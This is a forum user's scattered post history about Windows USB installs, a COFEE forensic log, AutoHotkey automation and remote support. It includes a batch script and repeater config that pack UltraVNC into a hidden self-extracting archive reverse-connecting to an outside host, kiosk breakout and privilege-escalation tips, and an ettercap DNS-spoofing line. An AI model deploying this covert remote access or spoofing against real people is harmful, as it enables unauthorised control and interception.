operat0r_001
-
Posts
327 -
Joined
-
Last visited
-
Days Won
1
Posts posted by operat0r_001
-
-
I search for usboot and did not see any post so I did this real quick ..
USBOOT.ORG ( the idea behind it creates a image of the current OS and tweaks it for you )
* load up a new clean VM with what ever MS OS you like ( MUST BE NTFS ! tested with windows XP )
* download driverpacks.net ( I just used LAN and WIFI )
* install usboot.org on the VMware image ( just extract to c:\ )
* place the driverpacks extracted into the c:\extra drivers folder of the usboot.org install
* read the readme file for basic idea of how it works ...
* run phase 1 ( phase-I )
* while phase 1 is running format and make the USB flash drive bootable ( I downloaded WinSetupFromUSB and format the use stick FAT32. NTFS should work to but not sure )
after its all said and done you end up with ~ 1.6gig install of windows with LAN and WIFI drivers .. you can add more drivers etc but partiamge it came out to a 777meg image ! you can DUMP that image to a HDD and boot all in under like 4min ... beats Nlite by 50min :)
* sometimes I get bluescreen but reboot it works ok
* sometimes I have to reboot for it to boot off the usb stick or plug it into the back
-
Wow .. really ? dont even bother .. its like hacksaw but some how worse .. only good thing about it prob not picked up by malware scanners ... ..
This "Computer Online Forensic Evidence Extractor (COFEE)" is no more then just old windows exe all compiled into a dump log with some www.sysinternals.com utils added on ... w0w really .. ? this is joke right ?!?
--operat0r AKA rmccurdy.com
//----------------------------------------------- // Check Requied Files //----------------------------------------------- Finding uptime.exe ... found Finding config.txt ... found Finding folders.txt ... found Finding pausep.exe ... found Finding NW3C_SHA1.exe ... found //----------------------------------------------- // Load Config //----------------------------------------------- //----------------------------------------------- // Read Disk Label //----------------------------------------------- //----------------------------------------------- // Find COFEE Drives //----------------------------------------------- //----------------------------------------------- // Detect OS //----------------------------------------------- The OS of this system is Windows XP //----------------------------------------------- // Create Output Folders //----------------------------------------------- F:\out-PANSY-8349E3157-20091110214413 is created F:\out-PANSY-8349E3157-20091110214413\network is created F:\out-PANSY-8349E3157-20091110214413\process is created F:\out-PANSY-8349E3157-20091110214413\services is created F:\out-PANSY-8349E3157-20091110214413\users is created F:\out-PANSY-8349E3157-20091110214413\password is created F:\out-PANSY-8349E3157-20091110214413\policy is created F:\out-PANSY-8349E3157-20091110214413\registry is created F:\out-PANSY-8349E3157-20091110214413\log is created F:\out-PANSY-8349E3157-20091110214413\file is created F:\out-PANSY-8349E3157-20091110214413\memory is created F:\out-PANSY-8349E3157-20091110214413\opt_tool is created F:\out-PANSY-8349E3157-20091110214413\misc is created //----------------------------------------------- // Run Command //----------------------------------------------- Start COFEE Verifying ... Success Start... Commandline : at.exe [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : autorunsc.exe [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : arp.exe -a [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : getmac.exe [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : hostname.exe [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : ipconfig.exe /all [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : msinfo32.exe /report F:\out-PANSY-8349E3157-20091110214413\misc\1b 7c1a3b3ded3e610cdb046ddbdf2c22.txt [Press Space to KILL the Process] ************************************ Pause... Select Process to kill : 0 ... Resume 1 ... msinfo32.exe ************************************ ************************************ Killing msinfo32.exe /report F:\out-PANSY-8349E3157-20091110214413\misc\1b7c1a3b 3ded3e610cdb046ddbdf2c22.txt ************************************ Calculating Hash ... Done End Verifying ... Success Start... Commandline : nbtstat.exe -A 127.0.0.1 [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : nbtstat.exe -S [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : nbtstat.exe -c [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : nbtstat.exe -n [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe user [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe file [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe accounts [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe view [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe start [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe session [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe localgroup administrators /domain [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe localgroup [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe share [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe use [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe localgroup administrators [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : net.exe group [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : netdom.exe query DC [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : openfiles.exe /query /v [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : psfile.exe [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : pslist.exe -t [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : pslist.exe [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : psloggedon.exe [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : psservice.exe [Press Space to KILL the Process] Calculating Hash ... Done End Verifying ... Success Start... Commandline : pstat.exe [Press Space to KILL the Process] Calculating Hash ...
-
FIXED :) backups were 3 days old and I made this just yesterday
-
my 80gig drive died last night still gettting things up ..
some how I guess I misread it as snuggie or something ..
08:57 <+Dfg> where is snubs :( 08:57 <+Dfg> Who cares! 08:58 <+Dfg> I will come my flying Camel and take you away 08:58 Dfg goes to fuel up his Camel 09:11 <operat0r> Dfg: that gave me a a great IDEA ! 09:11 <operat0r> LOL 09:11 <operat0r> HOLD ON give me like 15min ..lol 09:11 <operat0r> photoshop
-
man arp
-
interesting ? you got the exe I cna poke with ?? I need help with one of my projects a fully automated mass uninstaller
idea being you run it walk away and everything is uninstalled you put on the list :) not needing to know the options etc it would do things like not reboot and try to select the right stuff to click :P
pm me if you any good at it ..
F12:: ; Control Spy - Written by A.N.Suresh Kumar AKA Goyyah / 25-Aug-2006 / Version ?????? AutoTrim, OFF ^#!F12:: FileDelete, %A_Temp%\ControlList.txt IfWinExist,Control.Spy.Report,WinActivate,Control.Spy.Report IfWinExist,Control.Spy.Report,Exit Clis= ID:=WinExist("A") WinGet, Clist, ControlList, ahk_id %ID% WinGetTitle, Title, ahk_id %ID% WinGetClass, Class, ahk_id %ID% FileAppend, %Title% [Class:%Class%]`n, %A_Temp%\ControlList.txt FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt FileAppend,Sl c_Hwnd ClassNN Control Text (40 Characters only) `n, %A_Temp%\ControlList.txt FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt Loop, Parse, CList, `n { ControlGet,cHwnd, Hwnd,, %A_LoopField%, ahk_id %ID% ControlGetText,cText,, ahk_id %cHwnd% StringReplace,cText,cText, `n, % Chr(32), All StringReplace,cText,cText, `r, % Chr(32), All StringLeft,cText,cText,40 Clis = % Clis "`n" SetWidth(A_Index,3) ". " SetWidth(cHwnd,12) " " SetWidth(A_LoopField,40) " " Ctext } FileAppend, %Clis%`n, %A_Temp%\ControlList.txt FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt FileAppend,* Control Spy * By Goyyah, %A_Temp%\ControlList.txt FileRead, Report, %A_Temp%\ControlList.txt Gui,Font, s9, Courier New Gui,Add,Edit, w740 h540 , % Report Gui,Add,Button, x600 gGuiClose w140 , &Copy to Clipboard Gui,Show,,Control.Spy.Report Send, {Home} Return GuiEscape: GuiClose: Clipboard= % "[code]`n" Report "`n/[code]" ReLoad Return SetWidth(Str,Width) { Loop { If (StrLen(Str)>=Width) Break Else Str= % Str Chr(32) } Return Str } F11:: SoundPlay, %A_WinDir%\Media\ding.wav ;'ControlClick, OK, Some Window Title ; Clicks the OK button ControlClick, *ext*, BlackBerry Desktop Software 4.6 - InstallShield Wizard F10:: SoundPlay, %A_WinDir%\Media\ding.wav SetTitleMatchMode RegEx ;set main window title WinGetActiveTitle, main1 ; check for main window ;IfWinNotActive %main1% ;{ ;msgbox, startclicking ;} SoundPlay, %A_WinDir%\Media\ding.wav SetTitleMatchMode RegEx ;ControlClick, .*move.*,.* ;ControlClick, *[N|n]ext.*,.* ;ControlClick, *[O|o][K|k].Yes,.* ControlClick, Yes,.*
-
take a look at some foo here
-
http://www.binrev.com/forums/index.php/top...e__hl__repeater
ultravnc FTW mine now support windows vista/7 etc
http://forums.remote-exploit.org/programmi...ktop-vista.html
-
-
Portable Eclipse for Android dev / JRE (java) and / Android 1.5 SDK<br>
http://rapidshare.com/files/280881975/eclipse.zip.001
http://rapidshare.com/files/280887930/eclipse.zip.002
Been poking with my G1
http://delicious.com/operat0r/android
links to tons of example apps
-
no such thing a wifi security :) its all failsause
-
-
-
we use Zimbra exchange is for noobs
make a thinstall of Camtasia Studio
-
make a new local administrator >
boot with CD or USB
press F5 on boot try to login as admin
get something to run:
press F3 search for stuff to run cmd.exe etc ..also try to run stuff with IE "ctl+o" cmd etc ... also download cmd.exe and try to run it
try ctrl+alt+del to run stuff
look for old software on the system to exploit (insert adobe and flash) maybe even local privilege escalation :)
I have a usb drive with all my *tools* on it along with BT4 etc .. like this .. http://thepiratebay.org/torrent/4841204/UBER_PORTABLE_PACK you can also thinstall games and just rename it to notepad.exe etc ..
-
* give them the drive on a silver platter and tell them enjoy !
* boot safemode with networking kill explorer and scan with panda activescan pro http://rmccurdy.com/email.html
* also tell IT they should lock down all users or you will be back in a week ... noobs ...
* I offer flat 60$ remote support :)
-
rmccurdy.com/m3u.m3u all port 80 feeds from shoutcast autoupdated monthly :)
-
hehe you need to boot with the disk in the drive :P I did not think of that .. PM me know if you fix it
-
* this script TESTED WITH VISTA/WINDOWS 7 and XP
* this script auto reconnects when it does not find a established connection with the winvnc.exe
* file transfers work great on XP not so much windows 7 random crash
* get the repeater ( or just fwd a port to yourself on your router ) ( repeater allows you to remote any desktop from any desktop .. ( *NIX and WINDOWS ) IE no remote desktop over remote desktop ..
* http://sourceforge.net/projects/ultravnc/f...ix%20Repeaters/
#/etc/uvncrepeater.ini
[general] viewerport = 21 serverport = 3389 ownipaddress = 0.0.0.0 maxsessions = 100 #runasuser = uvncrep runasuser = root allowedmodes = 3 logginglevel = 3 [mode1] allowedmode1serverport = 0 requirelistedserver = 0 srvListAllow0 = 0.0.0.0;Allow network 10.x.x.x srvListAllow1 = 192.168.0.0;Allow network 192.168.x.x srvListAllow1 = 0.0.0.0 [mode2] requirelistedid = 0 idlist0 = 1111 idlist1 = 2222 idlist2 = 6667 idlist3 = 0 idlist4 = 0 idlist5 = 0 idlist6 = 0 idlist7 = 0 idlist8 = 0 idlist9 = 0 [eventinterface]
* start the repeater
* extract using 7-zip.org my exe and change the domain to yours etc ...
http://rmccurdy.com/scripts/quickvnc.exe
# vnccheck.tmp
cax /killall winvnc.exe Timeout.exe 5 start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run rem auto reconnect loop :loop Timeout.exe 60 Tcpvcon.exe -c | egrep -ia "winvnc.exe" | egrep "EST" if errorlevel 1 goto restartvnc Timeout.exe 60 goto loop :restartvnc echo Connection lost Killing VNC Processes... Timeout.exe 10 cax /killall winvnc.exe Timeout.exe 10 echo Reconnecting ... start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run goto loop
change the start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run
* for vista I mean windows 7 .... you need to make sure to RE RUN it as ADMINISTATOR and kill the old CMD.EXE or just have the user run it as admin google for why etc not going into this now .. it was a PIA ...
* pack the EXE using winrar SFX option I have it extract to %userprofile%\vnc2 and overwrite/hidden etc ... ( the way it runs you can run it more then once so beware of multi vncchecks running with multi ID's from the same client..
* you can also do this with some 7-zip fu ...
* now you are ready to connect to the repeater and control the host that ran your packed EXE
* run vncviewer.exe client and set it up like this ( for extra security you can add crypto )
* be sure to add the :: not just : the older client saves only one :
* you may also need to restart repeater and kill -9 it sometimes ... ...
* change the ports on the server you will need escalated for under port 1024 in windows/*nix
-
panda active scan pro FTW rmccurdy.com/email.html
-
all you had to say is cpanel.... http://rmccurdy.com/scripts /cpanel_scripts/ see the hackcheck lol my cpanel script cerca 2007 the webhost I worked for was about 40% owned I enjoyed watching people and detecting them
colocate
get me root
ill setup snort mod_sec and audit the site for ya ;)
-
you can use what ever you want if you use crypto .. hell dns tunnel it if you have to :)
-
yeah I hate to say it , but VNC is a pain because you have to configure port forwarding on routers and if the person is not technically minded and your a distance away then you have problems , teamviewer bypasses all these problems...
NO ...
and NO ...
vncrepeater owns them all ... 300K client download ( mine has extra stuff like vista support etc ... )
-
lol ... torrent noobs..
RickRoll done easy
in Security
Posted
* ettercap
* echo www.google.com A 75.131.195.228 > etter.dns
easy rickroll
OR WHAT EVER RMCCURDY.COM IP IS AT THE TIME ..
http://75.131.195.228